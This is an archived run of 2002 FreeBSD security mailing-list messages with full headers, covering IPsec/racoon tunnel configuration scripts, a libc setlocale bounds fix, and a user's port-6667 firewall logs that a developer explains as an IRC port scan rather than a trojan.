Received: from aus-gwia.aus.dcnhs.org (aus-gwia.aus.dcnhs.org [10.20.10.211]) by mail.seton.org (Postfix) with ESMTP id 0A516D011A; Fri, 2 Aug 2002 10:02:51 -0500 (CDT)
Received: from AUS_SETON-MTA by aus-gwia.aus.dcnhs.org with Novell_GroupWise; Fri, 02 Aug 2002 10:02:50 -0500
Message-Id:
X-Mailer: Novell GroupWise Internet Agent 6.0.1
Date: Fri, 02 Aug 2002 10:02:38 -0500
From: "Matthew Grooms"
To: ,
Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG to ipsec/racoon troubles, help please ...]
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Content-Disposition: inline
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Eric,

How traffic will be routed is defined by your near/far encryption domains that were configured via setkey/spdadd directives. These src/dst domains are compared to packet src/dst to determine if they need to be encrypted.
The IPSEC peer gateway is also defined for each spdadd so that your gateway knows where to forward the packets after the encrypt/encap step. This works a bit differently for gif-enabled tunnels because the IPSEC peer gateways are actually defined by the private tunnel interface end points, not the publicly routable interfaces. It's also possible to use a mixture of gif'd and 'vanilla' ESP tunnels. I am doing this right now, so I have attached my config script as an example.

echo Initializing IPSEC security policies ...

# create tunnel device
ifconfig gif0 create 2> /dev/null

# public addresses ( external )
gifconfig gif0 66.90.146.202 66.68.118.215

# private addresses ( internal )
ifconfig gif0 inet 10.22.200.1 10.1.2.1 netmask 255.255.255.0

# delete all existing SPD and SAD entries
setkey -FP
setkey -F

setkey -c << EOF
spdadd 10.22.200.0/24 10.1.2.0/24 any -P out ipsec esp/tunnel/10.22.200.1-10.1.2.1/require;
spdadd 10.1.2.0/24 10.22.200.0/24 any -P in ipsec esp/tunnel/10.1.2.1-10.22.200.1/require;
spdadd 10.22.200.0/24 10.20.0.0/16 any -P out ipsec esp/tunnel/66.90.146.202-65.118.63.252/require;
spdadd 10.20.0.0/16 10.22.200.0/24 any -P in ipsec esp/tunnel/65.118.63.252-66.90.146.202/require;
spdadd 10.22.200.0/24 10.21.0.0/16 any -P out ipsec esp/tunnel/66.90.146.202-65.118.63.252/require;
spdadd 10.21.0.0/16 10.22.200.0/24 any -P in ipsec esp/tunnel/65.118.63.252-66.90.146.202/require;
spdadd 10.22.200.0/24 10.23.0.0/16 any -P out ipsec esp/tunnel/66.90.146.202-65.118.63.252/require;
spdadd 10.23.0.0/16 10.22.200.0/24 any -P in ipsec esp/tunnel/65.118.63.252-66.90.146.202/require;
EOF

echo Restarting IKE daemon ...
killall racoon 2> /dev/null
sleep 1
/usr/local/sbin/racoon -l /var/log/racoon.log -v

I hope this answers your question.

-Matthew

>>> Eric Masson 08/02/02 08:07 AM >>>
>>>>> "Emss" == Eric Masson writes:
>>>>> "Crist" == Crist J Clark writes:

Follow-up to myself and -security re-added.
Crist> I've never figured out why people use gif(4) interfaces when ESP
Crist> does the tunneling for you.

Emss> Maybe because I've never succeeded in establishing an ESP tunnel
Emss> between two LANs without gif(4).

From owner-freebsd-security Fri Aug 2 08:23:08 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 54DFA37B400 for ; Fri, 2 Aug 2002 08:23:05 -0700 (PDT)
Received: from dogme.burningman.com (ns3.burningman.com [66.180.227.135]) by mx1.FreeBSD.org (Postfix) with SMTP id E831D43E70 for ; Fri, 2 Aug 2002 08:23:04 -0700 (PDT) (envelope-from glen@burningman.com)
Received: (qmail 99672 invoked by uid 89); 2 Aug 2002 15:26:59 -0000
Received: from localhost.burningman.com (HELO burningman.com) (127.0.0.1) by localhost.burningman.com with SMTP; 2 Aug 2002 15:26:59 -0000
Message-ID: <3D4AA44A.6010306@burningman.com>
Date: Fri, 02 Aug 2002 08:24:58
-0700
From: Glen Mehn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Trish Lynch
Cc: Security Officer , freebsd-security@FreeBSD.ORG
Subject: Re: [Q] FreeBSD IPSec Discussion.
References: <20020802093902.K497-100000@femme.sapphite.org>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Spam-Rating: localhost.burningman.com 1.6.2 900/1000/N
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Trish Lynch wrote:
>On Wed, 31 Jul 2002, Security Officer wrote:
>
>>Hello. Can anyone tell me which is the most
>>appropriate list to discuss FreeBSD IPSec
>>configuration and interoperability problems
>>(n.b. not freebsd-hackers)? I can't seem to
>>locate a list. Or is it all so simple no one
>>ever has any questions?
>
>No, it's so complicated that nobody has the answers :)
>
>Here or -questions would most likely be the best place. I just recently
>learned a hell of a lot about KAME/racoon by trial and error over the past
>couple of weeks, including interop issues with other vendors'
>software/hardware (specifically Ravlins), so if I can help, I'll attempt
>to.

IIRC, there's some side-discussion on the frees/wan site about this, usually in the realm of "freeswan + kame + nortel" or somesuch. I don't know what's currently there, but a year ago there was at least one doc, and you should be able to extrapolate, although you may need to learn a lot about frees/wan as well...
-g

From owner-freebsd-security Fri Aug 2 08:33:28 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F1EB737B400 for ; Fri, 2 Aug 2002 08:33:24 -0700 (PDT)
Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5EDF643E72 for ; Fri, 2 Aug 2002 08:33:24 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.5/8.12.5) with ESMTP id g72FXLSE077540; Fri, 2 Aug 2002 11:33:22 -0400 (EDT) (envelope-from mike@sentex.net)
Message-Id: <5.1.1.6.0.20020802113549.0541a008@marble.sentex.ca>
X-Sender: mdtpop@marble.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Fri, 02 Aug 2002 11:36:35 -0400
To: "Andrey A. Chernov" , security@FreeBSD.ORG
From: Mike Tancsa
Subject: Re: [ache@FreeBSD.org: cvs commit: src/lib/libc/locale setlocale.c]
In-Reply-To: <20020802011225.GA6411@nagual.pp.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Virus-Scanned: By Sentex Communications (obsidian/20020220)
X-Spam-Status: No, hits=-3.4 required=7.0 tests=IN_REP_TO version=2.31
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

Was this still going to be MFC'd ?

---Mike

At 05:12 AM 02/08/2002 +0400, Andrey A. Chernov wrote:
>Please file a security advisory for this fix (first part). That original BSD
>code bug can be exploitable.
>
>----- Forwarded message from "Andrey A. Chernov" -----
>
>Date: Thu, 1 Aug 2002 18:04:49 -0700 (PDT)
>From: "Andrey A.
>Chernov"
>Subject: cvs commit: src/lib/libc/locale setlocale.c
>To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org
>
>ache        2002/08/01 18:04:49 PDT
>
>  Modified files:
>    lib/libc/locale      setlocale.c
>  Log:
>  Prevent out of bounds writing for too many slashes case.
>  Replace strncpy + ='\0' with strlcpy
>
>  MFC after:    1 day
>
>  Revision  Changes    Path
>  1.35      +10 -14    src/lib/libc/locale/setlocale.c
>
>----- End forwarded message -----
>
>--
>Andrey A. Chernov
>http://ache.pp.ru/

From owner-freebsd-security Fri Aug 2 08:48:42 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3AE4537B400 for ; Fri, 2 Aug 2002 08:48:39 -0700 (PDT)
Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6146243E6A for ; Fri, 2 Aug 2002 08:48:38 -0700 (PDT) (envelope-from hawkeyd@visi.com)
Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id 6CA59573C for ; Fri, 2 Aug 2002 10:48:37 -0500 (CDT)
Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g72FmaC25313 for freebsd-security@freebsd.org; Fri, 2 Aug 2002 10:48:36 -0500 (CDT) (envelope-from hawkeyd)
Date: Fri, 2 Aug 2002 10:48:36 -0500
From: D J Hawkey Jr
To: security at FreeBSD
Subject: OpenSSL trojan: I seem to have post-install evidence?
Message-ID: <20020802104836.A16486@sheol.localdomain>
Reply-To: hawkeyd@visi.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi All.

I need some help here. I 'cvsup'd from RELENG_4_5 yesterday, and built and installed the world, bringing my system to 4.5-RELEASE-p15. I have since seen the following in /var/log/security:

---8<---
Aug 2 10:27:15 sheol ipmon[70]: 10:27:15.792366 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN
Aug 2 10:27:15 sheol ipmon[70]: 10:27:15.793415 dc1 @1:13 b 216.196.144.24,1167 -> 208.42.101.193,6667 PR tcp len 20 48 -S IN
Aug 2 10:27:18 sheol ipmon[70]: 10:27:18.702554 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN
Aug 2 10:27:18 sheol ipmon[70]: 10:27:18.726508 dc1 @1:13 b 216.196.144.24,1167 -> 208.42.101.193,6667 PR tcp len 20 48 -S IN
Aug 2 10:27:24 sheol ipmon[70]: 10:27:24.710308 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN
Aug 2 10:27:24 sheol ipmon[70]: 10:27:24.749498 dc1 @1:13 b 216.196.144.24,1167 -> 208.42.101.193,6667 PR tcp len 20 48 -S IN
--->8---

From what I've read, the trojan tries to use port 6667, and I haven't got any such log entries to port 6667 prior to my updating to 4.5-RELEASE-p15.

Is there something undiscovered, and perhaps sinister, going on here? I'll be happy to provide more data as requested.

Please reply by mail to me (and the list, as desired), as I'm not subscribed to -security.

Thanks,
Dave

--
D. J. HAWKEY JR.
/ __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 10:19:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F0E3837B400 for ; Fri, 2 Aug 2002 10:19:15 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7176C43E70 for ; Fri, 2 Aug 2002 10:19:15 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id D269A10; Fri, 2 Aug 2002 12:19:14 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g72HJEU4050943; Fri, 2 Aug 2002 12:19:14 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g72HJE3r050942; Fri, 2 Aug 2002 12:19:14 -0500 (CDT) Date: Fri, 2 Aug 2002 12:19:14 -0500 From: "Jacques A. Vidrine" To: D J Hawkey Jr Cc: security at FreeBSD Subject: Re: OpenSSL trojan: I seem to have post-install evidence? Message-ID: <20020802171914.GB50692@madman.nectar.cc> Mail-Followup-To: "Jacques A. 
Vidrine" , D J Hawkey Jr , security at FreeBSD References: <20020802104836.A16486@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020802104836.A16486@sheol.localdomain> X-Url: http://www.nectar.cc/ User-Agent: Mutt/1.5.1i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Aug 02, 2002 at 10:48:36AM -0500, D J Hawkey Jr wrote: > Aug 2 10:27:15 sheol ipmon[70]: 10:27:15.792366 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN This is someone port scanning you for IRC. (Your network is 208.42.101.192/something.) It has nothing to do with OpenSSL or OpenSSH (which is what I assume you really meant) or 4.5-RELEASE-pWhatever or FreeBSD. > From what I've read, the trojan tries to use port 6667, and I haven't got > any such log entries to port 6667 prior to my updating to 4.5-RELEASE-p15. The trojan was never something incorporated into the FreeBSD base system, and the port would report a checksum mismatch. You don't really have anything to worry about unless you manually fetched and installed the trojan'd ssh. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . 
nectar@kth.se

From owner-freebsd-security Fri Aug 2 10:20:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0688D37B435 for ; Fri, 2 Aug 2002 10:20:34 -0700 (PDT) Received: from femme.sapphite.org (pcp02268182pcs.longhl01.md.comcast.net [68.50.99.190]) by mx1.FreeBSD.org (Postfix) with ESMTP id E219943E5E for ; Fri, 2 Aug 2002 10:20:32 -0700 (PDT) (envelope-from trish@bsdunix.net) Received: from localhost (trish@localhost [127.0.0.1]) by femme.sapphite.org (8.12.5/8.12.5) with ESMTP id g72HLZmR006575 for ; Fri, 2 Aug 2002 13:21:35 -0400 (EDT) (envelope-from trish@bsdunix.net) Date: Fri, 2 Aug 2002 13:21:35 -0400 (EDT) From: Trish Lynch X-X-Sender: To: Subject: Re: [Q] FreeBSD IPSec Discussion. In-Reply-To: <20020802093902.K497-100000@femme.sapphite.org> Message-ID: <20020802131910.E6519-100000@femme.sapphite.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Lots of people have requested that I document this info somewhere, and I will do so, probably this Sunday, when I have a little free time to myself.

I *do* use the gif interface, and I have some pretty stable tunnels, again, YMMV. I've even gotten it to run with interfaces that have packets diverted through natd :)

-Trish

On Fri, 2 Aug 2002, Trish Lynch wrote:
>
> No, it's so complicated that nobody has the answers :)
>
> Here or -questions would most likely be the best place. I just recently
> learned a hell of a lot about KAME/racoon by trial and error over the past
> couple weeks, including interop issues between other vendor's
> software/hardware.
(specifically Ravlins), so If I can help, I'll attempt > to. > > -Trish > > > -- > Trish Lynch trish@bsdunix.net > FreeBSD The Power to Serve > Ecartis Core Team trish@listmistress.org > http://www.freebsd.org > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Trish Lynch trish@bsdunix.net FreeBSD The Power to Serve Ecartis Core Team trish@listmistress.org http://www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 10:27:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5BC6737B400 for ; Fri, 2 Aug 2002 10:27:33 -0700 (PDT) Received: from rwcrmhc52.attbi.com (rwcrmhc52.attbi.com [216.148.227.88]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9E4A743E75 for ; Fri, 2 Aug 2002 10:27:32 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc52.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020802172732.GPWM22139.rwcrmhc52.attbi.com@blossom.cjclark.org>; Fri, 2 Aug 2002 17:27:32 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g72HRVJK007077; Fri, 2 Aug 2002 10:27:31 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g72HRT7p007076; Fri, 2 Aug 2002 10:27:29 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Fri, 2 Aug 2002 10:27:29 -0700 From: "Crist J. Clark" To: Eric Masson Cc: Matthew Grooms , dlavigne6@cogeco.ca, Mailing List FreeBSD Security Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG to ipsec/racoon troubles, help please ...] 
Message-ID: <20020802172729.GA6880@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <20020730074813.GF89241@blossom.cjclark.org> <86znw5r9h3.fsf_-_@notbsdems.nantes.kisoft-services.com> <86k7n9qv08.fsf@notbsdems.nantes.kisoft-services.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <86k7n9qv08.fsf@notbsdems.nantes.kisoft-services.com> User-Agent: Mutt/1.4i X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Fri, Aug 02, 2002 at 02:56:39PM +0200, Eric Masson wrote:
> >>>>> "Emss" == Eric Masson writes:
> >>>>> "Crist" == Crist J Clark writes:
>
> Follow-up to myself and -security re-added.
>
> Crist> I've never figured out why people use gif(4) interfaces when ESP
> Crist> does the tunneling for you.
>
> Emss> Maybe because I've never succeeded establishing an esp tunnel
> Emss> between two LANs without gif(4).
>
> I've tried without gif tunnel (erroneous rc.conf modification) and it
> works, maybe Murphy's law had prevented this before ;)
>
> There's one question still remaining:
> - if there is more than one esp tunnel configured, how is traffic
> routed?
>
> Example:
> - One esp tunnel from 192.168.0.1 to 10.93.0.1
> - One esp tunnel from 192.168.0.1 to 10.44.0.1
>
> With only one tunnel configured, netstat -rn on the security gateway
> doesn't show any routes to the remote networks nor host.
>
> With a second tunnel added, are there any additional configuration
> steps or will the kernel do the routing automagically?

It's pretty much automagically done by way of the SPD entry. Any packet that matches the source and destination in the SPD gets put through the appropriate tunnel with the specified end points. It's not the same as the regular routing table and will not show up in 'netstat -rn.'

-- Crist J.
Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 10:43:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 512C437B400 for ; Fri, 2 Aug 2002 10:43:23 -0700 (PDT) Received: from rwcrmhc52.attbi.com (rwcrmhc52.attbi.com [216.148.227.88]) by mx1.FreeBSD.org (Postfix) with ESMTP id A29AD43E75 for ; Fri, 2 Aug 2002 10:43:22 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc52.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020802174322.HKUX22139.rwcrmhc52.attbi.com@blossom.cjclark.org>; Fri, 2 Aug 2002 17:43:22 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g72HhMJK007147; Fri, 2 Aug 2002 10:43:22 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g72HhMlu007146; Fri, 2 Aug 2002 10:43:22 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Fri, 2 Aug 2002 10:43:21 -0700 From: "Crist J. Clark" To: Matthew Grooms Cc: freebsd-security@FreeBSD.org Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG to ipsec/racoontroubles, help please ...] 
Message-ID: <20020802174321.GB6880@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Fri, Aug 02, 2002 at 10:02:38AM -0500, Matthew Grooms wrote:
> Eric,
>
> How traffic will be routed is defined by your near/far encryption
> domains that were configured via setkey/spdadd directives. These src/dst
> domains are compared to packet src/dst to determine if they need to be
> encrypted. The IPSEC peer gateway is also defined for each spdadd so
> that your gateway knows where to forward the packets after the
> encrypt/encap step.

Yep.

> This works a bit differently for gif enabled tunnels because the IPSEC
> peer gateways are actually defined by the private tunnel interface end
> points, not the publicly routable interfaces. It's also possible to use a
> mixture of gif'd and 'vanilla' ESP tunnels. I am doing this right now so
> I have attached my config script as an example.

But why? Is there something this configuration buys you that you don't get when all are "vanilla" ESP tunnels?

>
>
> echo Initializing IPSEC security policies ...
>
> # create tunnel device
> ifconfig gif0 create 2> /dev/null
>
> # public addresses ( external )
> gifconfig gif0 66.90.146.202 66.68.118.215
>
> # private addresses ( internal )
> ifconfig gif0 inet 10.22.200.1 10.1.2.1 netmask 255.255.255.0
>
> # delete all existing SPD and SAD entries
> setkey -FP
> setkey -F
> setkey -c << EOF
>
> spdadd 10.22.200.0/24 10.1.2.0/24 any -P out ipsec
>     esp/tunnel/10.22.200.1-10.1.2.1/require;
> spdadd 10.1.2.0/24 10.22.200.0/24 any -P in ipsec
>     esp/tunnel/10.1.2.1-10.22.200.1/require;

You seem to be doing this backwards from the usual way (or what I think of as the usual way)... and I really do not understand why. You are taking traffic from,

    10.22.200.0/24 <-> 10.1.2.0/24

And encapsulating it in an ESP tunnel,

    10.22.200.1 <-> 10.1.2.1

Which _then_ gets put into an (unencrypted) gif(4) tunnel,

    66.90.146.202 <-> 66.68.118.215

When I think of gif(4) tunnels, I think of people doing,

    10.22.200.0/24 <-> 10.1.2.0/24

In a gif(4) tunnel,

    66.90.146.202 <-> 66.68.118.215

And then running ESP in _transport_ mode between those same two endpoints. I could also see running a tunnel within a tunnel like you have, but again, I would usually expect the ESP tunnel to be the outer one.

> spdadd 10.22.200.0/24 10.20.0.0/16 any -P out ipsec
>     esp/tunnel/66.90.146.202-65.118.63.252/require;
> spdadd 10.20.0.0/16 10.22.200.0/24 any -P in ipsec
>     esp/tunnel/65.118.63.252-66.90.146.202/require;
>
> spdadd 10.22.200.0/24 10.21.0.0/16 any -P out ipsec
>     esp/tunnel/66.90.146.202-65.118.63.252/require;
> spdadd 10.21.0.0/16 10.22.200.0/24 any -P in ipsec
>     esp/tunnel/65.118.63.252-66.90.146.202/require;
>
> spdadd 10.22.200.0/24 10.23.0.0/16 any -P out ipsec
>     esp/tunnel/66.90.146.202-65.118.63.252/require;
> spdadd 10.23.0.0/16 10.22.200.0/24 any -P in ipsec
>     esp/tunnel/65.118.63.252-66.90.146.202/require;

-- Crist J.
Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 10:51:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 600F337B400 for ; Fri, 2 Aug 2002 10:51:21 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 381D343E70 for ; Fri, 2 Aug 2002 10:51:20 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.5/8.12.5) with ESMTP id g72HpHSE088393; Fri, 2 Aug 2002 13:51:17 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.1.6.0.20020802134758.040a3e08@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Fri, 02 Aug 2002 13:54:32 -0400 To: cjclark@alum.mit.edu From: Mike Tancsa Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG to ipsec/racoontroubles, help please ...] Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020802174321.GB6880@blossom.cjclark.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020220) X-Spam-Status: No, hits=-3.4 required=7.0 tests=IN_REP_TO version=2.31 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 10:43 AM 02/08/2002 -0700, Crist J. Clark wrote: >But why? Is there something this configuration buys you that you don't >get when all are "vanilla" ESP tunnels? I guess for me, when it gets routed through an interface the "feel" is more consistent. 
I do a netstat -nr, and I can see where the route points to. I can then also do further firewall rules on traffic via the gif interface. I don't like the fact that my tunnels somehow don't show up in a netstat -nr. I know that sounds trivial, but I think it's somewhat important in security matters-- i.e. the admin has a good feeling at a gut level how it all works rather than, "oh yeah, normally it works that way, but not in this case." The less one has to stop and consider "oh yeahs" / exceptions the better IMHO.

---Mike

From owner-freebsd-security Fri Aug 2 10:54:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4F9FA37B400 for ; Fri, 2 Aug 2002 10:54:39 -0700 (PDT) Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by mx1.FreeBSD.org (Postfix) with ESMTP id C9A7343E77 for ; Fri, 2 Aug 2002 10:54:38 -0700 (PDT) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id 9F9D95DC9 for ; Fri, 2 Aug 2002 12:28:54 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g72HSp055978 for freebsd-security@freebsd.org; Fri, 2 Aug 2002 12:28:51 -0500 (CDT) (envelope-from hawkeyd) Date: Fri, 2 Aug 2002 12:28:51 -0500 From: D J Hawkey Jr To: security at FreeBSD Subject: Re: OpenSSL trojan: I seem to have post-install evidence?
Message-ID: <20020802122851.A55094@sheol.localdomain> Reply-To: hawkeyd@visi.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Earlier, I wrote: ----- Forwarded message from D J Hawkey Jr ----- Hi All. I need some help here. I 'csvup'd from RELENG_4_5 yesterday, and built and installed the world, bringing my system to 4.5-RELEASE-15. I have since seen the following in /var/log/security: ---8<--- Aug 2 10:27:15 sheol ipmon[70]: 10:27:15.792366 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN Aug 2 10:27:15 sheol ipmon[70]: 10:27:15.793415 dc1 @1:13 b 216.196.144.24,1167 -> 208.42.101.193,6667 PR tcp len 20 48 -S IN Aug 2 10:27:18 sheol ipmon[70]: 10:27:18.702554 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN Aug 2 10:27:18 sheol ipmon[70]: 10:27:18.726508 dc1 @1:13 b 216.196.144.24,1167 -> 208.42.101.193,6667 PR tcp len 20 48 -S IN Aug 2 10:27:24 sheol ipmon[70]: 10:27:24.710308 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN Aug 2 10:27:24 sheol ipmon[70]: 10:27:24.749498 dc1 @1:13 b 216.196.144.24,1167 -> 208.42.101.193,6667 PR tcp len 20 48 -S IN --->8--- From what I've read, the trojan tries to use port 6667, and I haven't got any such log entries to port 6667 prior to my updating to 4.5-RELEASE-p15. 
